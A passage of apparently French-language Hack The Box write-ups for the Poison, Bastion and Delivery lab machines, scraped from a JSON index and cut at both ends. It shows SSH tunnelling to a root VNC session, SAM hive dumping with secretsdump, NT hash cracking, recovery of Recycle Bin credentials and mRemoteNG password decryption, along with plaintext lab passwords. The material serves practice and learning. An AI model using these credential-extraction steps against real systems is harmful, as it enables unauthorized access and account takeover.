state=$(\u0026lt;\u0026lt;\u0026lt;\u0026#34;$state\u0026#34; base64 --decode) done echo \u0026#34;$state\u0026#34; Charix!2#4%6\u0026amp;8(0 ┌──(kali㉿kali)-[~/htb/Poison] └─$ ssh charix@10.10.10.84 (charix@10.10.10.84) Password for charix@Poison: Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4 FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 Welcome to FreeBSD! Release Notes, Errata: https://www.FreeBSD.org/releases/ Security Advisories: https://www.FreeBSD.org/security/ FreeBSD Handbook: https://www.FreeBSD.org/handbook/ FreeBSD FAQ: https://www.FreeBSD.org/faq/ Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ FreeBSD Forums: https://forums.FreeBSD.org/ Documents installed with the system are in the /usr/local/share/doc/freebsd/ directory, or can be installed later with: pkg install en-freebsd-doc For other languages, replace \u0026#34;en\u0026#34; with a language code like de or fr. Show the version of FreeBSD installed: freebsd-version ; uname -a Please include that output and any error messages when posting questions. Introduction to manual pages: man man FreeBSD directory layout: man hier Edit /etc/motd to change this login announcement. Man pages are divided into section depending on topic. There are 9 different sections numbered from 1 (General Commands) to 9 (Kernel Developer\u0026#39;s Manual). You can get an introduction to each topic by typing man \u0026lt;number\u0026gt; intro In other words, to get the intro to general commands, type man 1 intro charix@Poison:~ % cat user.txt eaac.....209c On a donc : charix : Charix!2#4%6\u0026amp;8(0\nPrivilege Escalation secret.zip On découvre un fichier secret.zip chiffré à la racine du home de charlix. On peut le déchiffrer avec le meme mdp que popur le ssh de charlix: Charix!2#4%6\u0026amp;8(0\nOn découvre un fichier de 8 caracteres chiffrés\nVNC launched by root En regardant les process executés par root, on découvre une sessions VNC ouverte sur le port 5901, lancé par root. Si on arrive a s\u0026rsquo;y connecté, on peut optentiellemnt avec un shell en tant que root.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ╚ Check weird \u0026amp; unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 1 0.0 0.1 5408 1040 - SLs 22:56 0:00.00 /sbin/init -- root 319 0.0 0.5 9560 5052 - Ss 22:56 0:00.09 /sbin/devd root 390 0.0 0.2 10500 2452 - Ss 22:56 0:00.04 /usr/sbin/syslogd -s root 543 0.0 0.5 56320 5396 - S 22:57 0:01.18 /usr/local/bin/vmtoolsd -c /usr/local/share/vmware-tools/tools.conf -p /usr/local/lib/open-vm-tools/plugins/vmsvc root 620 0.0 0.7 57812 7052 - Is 22:57 0:00.01 /usr/sbin/sshd root 625 0.0 1.1 99172 11516 - Ss 22:58 0:00.06 /usr/local/sbin/httpd -DNOHTTPACCEPT root 642 0.0 0.6 20636 6140 - Ss 22:58 0:00.03 sendmail: accepting connections (sendmail) root 650 0.0 0.2 12592 2436 - Ss 22:59 0:00.01 /usr/sbin/cron -s root 529 0.0 0.9 23620 8872 v0- I 22:57 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1 root 540 0.0 0.7 67220 7064 v0- I 22:57 0:00.01 xterm -geometry 80x24+10+10 -ls -title X Desktop root 541 0.0 0.5 37620 5312 v0- I 22:57 0:00.00 twm root 697 0.0 0.2 10484 2076 v0 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv0 root 698 0.0 0.2 10484 2076 v1 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv1 root 699 0.0 0.2 10484 2076 v2 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv2 root 700 0.0 0.2 10484 2076 v3 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv3 root 701 0.0 0.2 10484 2076 v4 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv4 root 702 0.0 0.2 10484 2076 v5 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv5 root 703 0.0 0.2 10484 2076 v6 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv6 root 704 0.0 0.2 10484 2076 v7 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv7 root 617 0.0 0.4 19660 3616 0 Is+ 22:57 0:00.00 -csh (csh) Dechiffrement du fichier secret Finalement, on emet l\u0026rsquo;hypothese que le fichier secret serait un fichier de mot de passe chiffré pour vnc. On tente d\u0026rsquo;utiliser un outil github pour le déchiffré : https://github.com/jeroennijhof/vncpwd\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ┌──(kali㉿kali)-[~/htb/Poison] └─$ git clone https://github.com/jeroennijhof/vncpwd.git Cloning into \u0026#39;vncpwd\u0026#39;... remote: Enumerating objects: 28, done. remote: Total 28 (delta 0), reused 0 (delta 0), pack-reused 28 (from 1) Receiving objects: 100% (28/28), 22.15 KiB | 1.85 MiB/s, done. Resolving deltas: 100% (9/9), done. ┌──(kali㉿kali)-[~/htb/Poison] └─$ cd vncpwd ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ ls d3des.c d3des.h LICENSE Makefile README vncpwd.c ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ make gcc -Wall -g -o vncpwd vncpwd.c d3des.c ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ ./vncpwd ../secret Password: VNCP@$$! On obtient le mot de passe: VNCP@$$!\nConnexion sur la session VNC - root flag On peut se connecter a une session VNC facilement en utilisant l\u0026rsquo;outil vncviewer. Mais le port 5901 n\u0026rsquo;est dispo qu\u0026rsquo;en local sur la machine ! Je propose de résoudre ce probleme en faisant du port forwarding sur ma machine, à l\u0026rsquo;aide l\u0026rsquo;option -L de ssh.\nEnsuite j\u0026rsquo;ai pu utiliser vncviewer et ouvrir la session avec le mot de passe obtenu\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 ┌──(kali㉿kali)-[~/htb/Poison] └─$ ssh charix@10.10.10.84 -L 5901:localhost:5901 Charix!2#4%6\u0026amp;8(0 (charix@10.10.10.84) Password for charix@Poison: Last login: Tue Mar 4 23:11:10 2025 from 10.10.14.19 FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 Welcome to FreeBSD! --------------------------------------------- ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ nmap localhost -p 5901 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-04 17:35 EST Nmap scan report for localhost (127.0.0.1) Host is up (0.000067s latency). Other addresses for localhost (not scanned): ::1 PORT STATE SERVICE 5901/tcp open vnc-1 Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ vncviewer localhost vncviewer: ConnectToTcpAddr: connect: Connection refused Unable to connect to VNC server ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ vncviewer localhost:5901 Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions Performing standard VNC authentication Password: Authentication successful Desktop name \u0026#34;root\u0026#39;s X desktop (Poison:1)\u0026#34; VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Same machine: preferring raw encoding --------- VNCVIEWER ------------- root@Poison:~ # whoami root root@Poison:~ # cat root.txt 716d.....61f5 ","date":"2025-03-04T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/poison-htb/","title":"HTB | Poison"},{"content":" Machine name OS IP Difficulty Bastion Windows 10.10.10.134 Easy Users 1 2 3 L4mpje : bureaulampje Administrator : thXLHM96BeKL0ER2 Peter : 3RTTT5zNt2 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.134 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3 | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg= | 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Host script results: | smb2-time: | date: 2025-02-27T22:08:39 |_ start_date: 2025-02-27T22:04:13 | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\\x00 | Workgroup: WORKGROUP\\x00 |_ System time: 2025-02-27T23:08:38+01:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_clock-skew: mean: -19m59s, deviation: 34m38s, median: 0s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 26941/tcp): CLEAN (Couldn\u0026#39;t connect) | Check 2 (port 51775/tcp): CLEAN (Couldn\u0026#39;t connect) | Check 3 (port 18741/udp): CLEAN (Failed to receive data) | Check 4 (port 15523/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked Foothold SMB \u0026ldquo;backups\u0026rdquo; share 1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~/htb/Bastion] └─$ smbclient --no-pass -L //10.10.10.134 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin Backups Disk C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available Mount backup windows disk VDB 1 guestmount -a ./9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/vhd_mount Retrieve hashes from Windows files 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ┌──(root㉿kali)-[/home/kali/htb/Bastion] └─# cp /mnt/vhd_mount/Windows/System32/config/SAM . cp /mnt/vhd_mount/Windows/System32/config/SYSTEM . cp /mnt/vhd_mount/Windows/System32/config/SECURITY . ┌──(root㉿kali)-[/home/kali/htb/Bastion] └─# ls SAM SECURITY SYSTEM ┌──(root㉿kali)-[/home/kali/htb/Bastion] └─# impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] DefaultPassword (Unknown User):bureaulampje [*] DPAPI_SYSTEM dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6 dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd [*] Cleaning up... Hashcat bruteforce On a la confirmation que le mot de passe est bien: bureaulampje\n1 2 hashcat -m 1000 hash.txt ~/wordlists/rockyou.txt --show 26112010952d963c8dc4217daec986d9:bureaulampje SSH L4mpje 1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~] └─$ ssh L4mpje@10.10.10.134 Password: bureaulampje Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. l4mpje@BASTION C:\\Users\\L4mpje\u0026gt;whoami bastion\\l4mpje l4mpje@BASTION C:\\Users\\L4mpje\u0026gt;type Desktop\\user.txt 1018.....3717 Recycle Bin - Peter username/pass 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; dir -ah Directory: C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs- 22-2-2019 13:50 129 desktop.ini PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; cat .\\desktop.ini [.ShellClassInfo] CLSID={645FF040-5081-101B-9F08-00AA002F954E} LocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-8964 PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; Get-ChildItem Directory: C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 22-2-2019 13:56 214 $I1MMX2E.txt -a---- 22-2-2019 13:56 218 $INTSJCP.bat -a---- 22-2-2019 13:54 67 $R1MMX2E.txt -a---- 22-2-2019 13:56 58 $RNTSJCP.bat PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; Get-ChildItem -Force Directory: C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 22-2-2019 13:56 214 $I1MMX2E.txt -a---- 22-2-2019 13:56 218 $INTSJCP.bat -a---- 22-2-2019 13:54 67 $R1MMX2E.txt -a---- 22-2-2019 13:56 58 $RNTSJCP.bat -a-hs- 22-2-2019 13:50 129 desktop.ini PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; cat \u0026#39;$RNTSJCP.bat\u0026#39; NET USE Z: \u0026#34;\\\\192.168.1.74\\Backups\u0026#34; /user:Peter 3RTTT5zNt2 PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; date maandag 3 maart 2025 00:05:57 PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; cat \u0026#39;$I1MMX2E.txt\u0026#39; C P9c ®ÊÔ]] C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ S t a r t M e n u \\ P r o g r a m s \\ S t a r t u p \\ L 4 m p j e . b a t . t x t PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; cat \u0026#39;$INTSJCP.bat\u0026#39; : : C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ : C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ : C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ : C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ : C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ : C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ : C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ : C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ ®ÊÔ_ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ ®®ÊÔ__ C : \\ U s e r s \\ L 4 m p j e \\ A p p D a t a \\ R o a m i n g \\ M i c r o s o f t \\ W i n d o w s \\ S t a r t M e n u \\ P r o g r a m s \\ S t a r t u p \\ P e t e r - s c r i p t . b a t PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; cat \u0026#39;$R1MMX2E.txt\u0026#39; NET USE Z: \u0026#34;\\\\192.168.1.74\\Backups\u0026#34; /user:L4mpje /pass:bureaulampje PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002\u0026gt; cat \u0026#39;$RNTSJCP.bat\u0026#39; NET USE Z: \u0026#34;\\\\192.168.1.74\\Backups\u0026#34; /user:Peter 3RTTT5zNt2 Privilege Escalation mRemoteNG En regardant les logiciels installés de plus près, on observe un logiciel intéressant et suspect. Il permet de se connecter à des systèmes en s\u0026rsquo;authentificant avec des mots de passe stocker dans sa configuration.\nRecuperation du fichier de configuration En cherchant sur internet on trouve cette info :\n1 %APPDATA%\\mRemoteNG\\confCons.xml Ce fichier semble contenir les mots de passe d\u0026rsquo;après un internaute. Après vérification, on retrouve le hachage du mot de passe de l\u0026rsquo;Administrateur ainsi que celui de L4mpje :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 PS C:\\Users\\L4mpje\\Appdata\\Roaming\\mRemoteNG\u0026gt; ls Directory: C:\\Users\\L4mpje\\Appdata\\Roaming\\mRemoteNG Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 22-2-2019 14:01 Themes -a---- 22-2-2019 14:03 6316 confCons.xml -a---- 22-2-2019 14:02 6194 confCons.xml.20190222-1402277353.backup -a---- 22-2-2019 14:02 6206 confCons.xml.20190222-1402339071.backup -a---- 22-2-2019 14:02 6218 confCons.xml.20190222-1402379227.backup -a---- 22-2-2019 14:02 6231 confCons.xml.20190222-1403070644.backup -a---- 22-2-2019 14:03 6319 confCons.xml.20190222-1403100488.backup -a---- 22-2-2019 14:03 6318 confCons.xml.20190222-1403220026.backup -a---- 22-2-2019 14:03 6315 confCons.xml.20190222-1403261268.backup -a---- 22-2-2019 14:03 6316 confCons.xml.20190222-1403272831.backup -a---- 22-2-2019 14:03 6315 confCons.xml.20190222-1403433299.backup -a---- 22-2-2019 14:03 6316 confCons.xml.20190222-1403486580.backup -a---- 22-2-2019 14:03 51 extApps.xml -a---- 22-2-2019 14:03 5217 mRemoteNG.log -a---- 22-2-2019 14:03 2245 pnlLayout.xml PS C:\\Users\\L4mpje\\Appdata\\Roaming\\mRemoteNG\u0026gt; cat .\\confCons.xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;mrng:Connections xmlns:mrng=\u0026#34;http://mremoteng.org\u0026#34; Name=\u0026#34;Connections\u0026#34; Export=\u0026#34;false\u0026#34; EncryptionEngine=\u0026#34;AES\u0026#34; BlockCipherMode=\u0026#34;GC M\u0026#34; KdfIterations=\u0026#34;1000\u0026#34; FullFileEncryption=\u0026#34;false\u0026#34; Protected=\u0026#34;ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0 oop8R8ddXKAx4KK7sAk6AA\u0026#34; ConfVersion=\u0026#34;2.6\u0026#34;\u0026gt; \u0026lt;Node Name=\u0026#34;DC\u0026#34; Type=\u0026#34;Connection\u0026#34; Descr=\u0026#34;\u0026#34; Icon=\u0026#34;mRemoteNG\u0026#34; Panel=\u0026#34;General\u0026#34; Id=\u0026#34;500e7d58-662a-44d4-aff0-3a4f547a3fee\u0026#34; Userna me=\u0026#34;Administrator\u0026#34; Domain=\u0026#34;\u0026#34; Password=\u0026#34;aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==\u0026#34; ... \u0026lt;Node Name=\u0026#34;L4mpje-PC\u0026#34; Type=\u0026#34;Connection\u0026#34; Descr=\u0026#34;\u0026#34; Icon=\u0026#34;mRemoteNG\u0026#34; Panel=\u0026#34;General\u0026#34; Id=\u0026#34;8d3579b2-e68e-48c1-8f0f-9ee1347c9128\u0026#34; Username=\u0026#34;L4mpje\u0026#34; Domain=\u0026#34;\u0026#34; Password=\u0026#34;yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB\u0026#34; ... Donc : Administrator : aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==\nDéchiffrement du hachage de l\u0026rsquo;Administrateur Un outil est dispo sur github pour cracker ce genre de fichier : https://github.com/haseebT/mRemoteNG-Decrypt\n1 2 3 ┌──(kali㉿kali)-[~/htb/Bastion/mRemoteNG-Decrypt] └─$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== Password: thXLHM96BeKL0ER2 Connection en SSH - root flag 1 2 3 4 5 6 7 8 9 ┌──(kali㉿kali)-[~/htb/Bastion] └─$ ssh Administrator@10.10.10.134 Administrator@10.10.10.134\u0026#39;s password: ** thXLHM96BeKL0ER2 ** Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. administrator@BASTION C:\\Users\\Administrator\u0026gt;type Desktop\\root.txt e90b.....42f6 ","date":"2025-03-03T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/bastion-htb/","title":"HTB | Bastion"},{"content":" Machine name OS IP Difficulty Delivery Linux 10.10.10.222 Easy Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 ┌──(kali㉿kali)-[~/htb/Delivery] └─$ nmap -sC -sV -An -p- -T4 -vvv 10.10.10.222 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCq549E025Q9FR27LDR6WZRQ52ikKjKUQLmE9ndEKjB0i1qOoL+WzkvqTdqEU6fFW6AqUIdSEd7GMNSMOk66otFgSoerK6MmH5IZjy4JqMoNVPDdWfmEiagBlG3H7IZ7yAO8gcg0RRrIQjE7XTMV09GmxEUtjojoLoqudUvbUi8COHCO6baVmyjZRlXRCQ6qTKIxRZbUAo0GOY8bYmf9sMLf70w6u/xbE2EYDFH+w60ES2K906x7lyfEPe73NfAIEhHNL8DBAUfQWzQjVjYNOLqGp/WdlKA1RLAOklpIdJQ9iehsH0q6nqjeTUv47mIHUiqaM+vlkCEAN3AAQH5mB/1 | 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAiAKnk2lw0GxzzqMXNsPQ1bTk35WwxCa3ED5H34T1yYMiXnRlfssJwso60D34/IM8vYXH0rznR9tHvjdN7R3hY= | 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEV5D6eYjySqfhW4l4IF1SZkZHxIRihnY6Mn6D8mLEW7 80/tcp open http syn-ack ttl 63 nginx 1.14.2 |_http-server-header: nginx/1.14.2 | http-methods: |_ Supported Methods: GET HEAD |_http-title: Welcome 8065/tcp open unknown syn-ack ttl 63 | fingerprint-strings: | GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Accept-Ranges: bytes | Cache-Control: no-cache, max-age=31556926, public | Content-Length: 3108 | Content-Security-Policy: frame-ancestors \u0026#39;self\u0026#39;; script-src \u0026#39;self\u0026#39; cdn.rudderlabs.com | Content-Type: text/html; charset=utf-8 | Last-Modified: Fri, 21 Feb 2025 11:56:08 GMT | X-Frame-Options: SAMEORIGIN | X-Request-Id: 518yfkngnbbmtm9xgi7thkpkdr | X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false | Date: Fri, 21 Feb 2025 12:00:01 GMT | \u0026lt;!doctype html\u0026gt;\u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt;\u0026lt;head\u0026gt;\u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt;\u0026lt;meta name=\u0026#34;viewport\u0026#34; content=\u0026#34;width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0\u0026#34;\u0026gt;\u0026lt;meta name=\u0026#34;robots\u0026#34; content=\u0026#34;noindex, nofollow\u0026#34;\u0026gt;\u0026lt;meta name=\u0026#34;referrer\u0026#34; content=\u0026#34;no-referrer\u0026#34;\u0026gt;\u0026lt;title\u0026gt;Mattermost\u0026lt;/title\u0026gt;\u0026lt;meta name=\u0026#34;mobile-web-app-capable\u0026#34; content=\u0026#34;yes\u0026#34;\u0026gt;\u0026lt;meta name=\u0026#34;application-name\u0026#34; content=\u0026#34;Mattermost\u0026#34;\u0026gt;\u0026lt;meta name=\u0026#34;format-detection\u0026#34; content=\u0026#34;telephone=no\u0026#34;\u0026gt;\u0026lt;link re | 